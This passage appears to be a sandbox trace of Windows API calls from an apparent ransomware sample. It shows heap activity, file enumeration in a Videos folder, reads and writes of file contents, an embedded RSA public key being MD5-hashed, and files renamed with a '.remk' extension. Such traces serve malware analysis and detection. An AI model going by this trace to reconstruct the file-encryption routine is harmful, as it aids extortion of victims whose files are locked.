hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0234.579] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ea8 [0234.579] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0234.579] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ec8 [0234.579] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee880 | out: hHeap=0x630000) returned 1 [0234.579] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee880 [0234.579] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0234.579] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x37c0db8 [0234.579] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee8e0 | out: hHeap=0x630000) returned 1 [0234.579] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6c48 [0234.579] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee910 | out: hHeap=0x630000) returned 1 [0234.579] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x37c0fc8 [0234.579] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ec8 | out: hHeap=0x630000) returned 1 [0234.579] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x72aea0 [0234.579] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0234.579] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6d60 [0234.580] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee880 | out: hHeap=0x630000) returned 1 [0234.580] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x37b5b70 [0234.580] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6c48 | out: hHeap=0x630000) returned 1 [0234.580] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x319bc40 [0234.580] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0234.580] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694398 | out: hHeap=0x630000) returned 1 [0234.580] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6a7330 | out: hHeap=0x630000) returned 1 [0234.580] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x319bc40 | out: hHeap=0x630000) returned 1 [0234.580] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ea8 | out: hHeap=0x630000) returned 1 [0234.580] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6d60 | out: hHeap=0x630000) returned 1 [0234.580] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c0fc8 | out: hHeap=0x630000) returned 1 [0234.580] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0234.580] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72aea0 | out: hHeap=0x630000) returned 1 [0234.580] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f758 | out: hHeap=0x630000) returned 1 [0234.580] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee8b0 | out: hHeap=0x630000) returned 1 [0234.580] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f778 | out: hHeap=0x630000) returned 1 [0234.580] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee8f8 | out: hHeap=0x630000) returned 1 [0234.580] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0234.580] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee898 | out: hHeap=0x630000) returned 1 [0234.581] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee868 | out: hHeap=0x630000) returned 1 [0234.581] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bddc8 | out: hHeap=0x630000) returned 1 [0234.581] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8ac8 | out: hHeap=0x630000) returned 1 [0234.581] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0234.581] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee850 | out: hHeap=0x630000) returned 1 [0234.581] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c578 | out: hHeap=0x630000) returned 1 [0234.581] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c0db8 | out: hHeap=0x630000) returned 1 [0234.581] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3195950 | out: hHeap=0x630000) returned 1 [0234.581] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5808 | out: hHeap=0x630000) returned 1 [0234.581] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6b30 | out: hHeap=0x630000) returned 1 [0234.581] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f08 | out: hHeap=0x630000) returned 1 [0234.581] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0234.581] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0234.581] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6990 | out: hHeap=0x630000) returned 1 [0234.581] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fd48 | out: hHeap=0x630000) returned 1 [0234.581] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0234.581] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0234.581] WriteFile (in: hFile=0x640, lpBuffer=0x37c4278*, nNumberOfBytesToWrite=0x18d62, lpNumberOfBytesWritten=0x3adfb14, lpOverlapped=0x0 | out: lpBuffer=0x37c4278*, lpNumberOfBytesWritten=0x3adfb14*=0x18d62, lpOverlapped=0x0) returned 1 [0234.582] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c4278 | out: hHeap=0x630000) returned 1 [0234.582] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x18d67, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0234.582] WriteFile (in: hFile=0x640, lpBuffer=0x3192918*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x3192918*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0234.582] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0234.582] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711900 [0234.582] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x325fb40 [0234.582] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", cchWideChar=-1, lpMultiByteStr=0x325fb40, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", lpUsedDefaultChar=0x0) returned 41 [0234.582] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x37c0db8 [0234.582] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0234.582] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711900 | out: hHeap=0x630000) returned 1 [0234.582] WriteFile (in: hFile=0x640, lpBuffer=0x37c0db8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x37c0db8*, lpNumberOfBytesWritten=0x3adfb50*=0x28, lpOverlapped=0x0) returned 1 [0234.582] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c0db8 | out: hHeap=0x630000) returned 1 [0234.583] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0234.583] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0234.583] CloseHandle (hObject=0x640) returned 1 [0234.588] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e698 [0234.588] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8a0) returned 0x325d3b0 [0234.588] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e698 | out: hHeap=0x630000) returned 1 [0234.588] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\g1CuCps yZIAOwjCa\\JTSMdg7_.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\g1cucps yziaowjca\\jtsmdg7_.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\g1CuCps yZIAOwjCa\\JTSMdg7_.avi.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\g1cucps yziaowjca\\jtsmdg7_.avi.remk")) returned 1 [0234.591] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d3b0 | out: hHeap=0x630000) returned 1 [0234.591] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0234.591] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0234.593] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4610 | out: hHeap=0x630000) returned 1 [0234.593] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x572d02a0, ftCreationTime.dwHighDateTime=0x1d5e0f3, ftLastAccessTime.dwLowDateTime=0x9f445ca0, ftLastAccessTime.dwHighDateTime=0x1d5dd74, ftLastWriteTime.dwLowDateTime=0x9f445ca0, ftLastWriteTime.dwHighDateTime=0x1d5dd74, nFileSizeHigh=0x0, nFileSizeLow=0x10890, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="kaWqD.avi", cAlternateFileName="")) returned 1 [0234.593] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba588 [0234.593] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa6) returned 0x31a4610 [0234.593] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37ba588 | out: hHeap=0x630000) returned 1 [0234.593] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\g1CuCps yZIAOwjCa\\kaWqD.avi") returned=".avi" [0234.593] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\g1CuCps yZIAOwjCa\\kaWqD.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\g1cucps yziaowjca\\kawqd.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0234.594] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=67728) returned 1 [0234.594] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0234.597] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x1086a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0234.597] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0234.599] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0234.599] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0234.599] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0234.599] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x10890, lpOverlapped=0x0) returned 1 [0234.601] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.601] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x325fb40 [0234.601] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.601] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.601] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694398) returned 1 [0234.602] CryptCreateHash (in: hProv=0x694398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0234.602] CryptHashData (hHash=0x31de170, pbData=0x325fb40, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0234.602] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0234.602] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0234.602] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0234.602] GetLastError () returned 0x0 [0234.602] CryptDestroyHash (hHash=0x31de170) returned 1 [0234.602] CryptReleaseContext (hProv=0x694398, dwFlags=0x0) returned 1 [0234.602] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0234.602] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0234.602] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0234.602] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0234.603] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0234.603] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0234.603] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0234.603] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10890) returned 0x37c4278 [0234.603] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0234.603] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0234.603] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0234.603] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0234.603] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fd48 [0234.603] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6990 [0234.603] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x325c578 [0234.604] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee850 [0234.604] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x325c5c0 [0234.604] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee868 [0234.604] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee898 [0234.604] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee8f8 [0234.604] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee8b0 [0234.604] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0234.604] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x31f7b30 [0234.604] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0234.604] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0234.604] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee898 | out: hHeap=0x630000) returned 1 [0234.604] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee8b0 | out: hHeap=0x630000) returned 1 [0234.604] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee8f8 | out: hHeap=0x630000) returned 1 [0234.604] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0234.604] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0234.604] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee8f8 [0234.604] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fee0 [0234.604] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee8b0 [0234.604] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0f28 [0234.604] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x31ee898 [0234.604] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0234.604] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x3192918 [0234.605] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0234.605] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0234.605] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0234.605] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0234.605] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0234.605] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0234.605] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0234.605] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee8b0 | out: hHeap=0x630000) returned 1 [0234.605] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0234.605] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee898 | out: hHeap=0x630000) returned 1 [0234.605] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0234.605] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0234.605] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee8f8 | out: hHeap=0x630000) returned 1 [0234.605] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0234.605] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6990 | out: hHeap=0x630000) returned 1 [0234.605] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1b88 | out: hHeap=0x630000) returned 1 [0234.605] GetCurrentThreadId () returned 0x314 [0234.605] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3192918 [0234.605] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37c37f0 [0234.605] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0234.605] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694398 [0234.605] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x37bddc8 [0234.606] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0234.606] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0234.606] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0234.606] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0234.606] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0234.606] GetCurrentThreadId () returned 0x314 [0234.606] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0234.606] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0234.606] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x6a7330 [0234.606] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0234.606] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0234.606] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0234.606] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0234.606] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6a7330 | out: hHeap=0x630000) returned 1 [0234.606] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x6a7330 [0234.606] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0234.606] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5808 [0234.606] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0234.606] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3195950 [0234.606] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0234.606] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee8f8 [0234.606] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0234.607] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0234.607] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0234.607] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0234.607] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0234.607] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0234.607] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0234.607] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0234.607] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee898 [0234.607] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0234.607] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fec0 [0234.607] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0234.607] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0234.607] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0234.607] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f798 [0234.607] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0234.607] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee8b0 [0234.607] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f798 | out: hHeap=0x630000) returned 1 [0234.607] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0234.607] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f788 | out: hHeap=0x630000) returned 1 [0234.607] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee880 [0234.607] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f7a8 | out: hHeap=0x630000) returned 1 [0234.607] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, 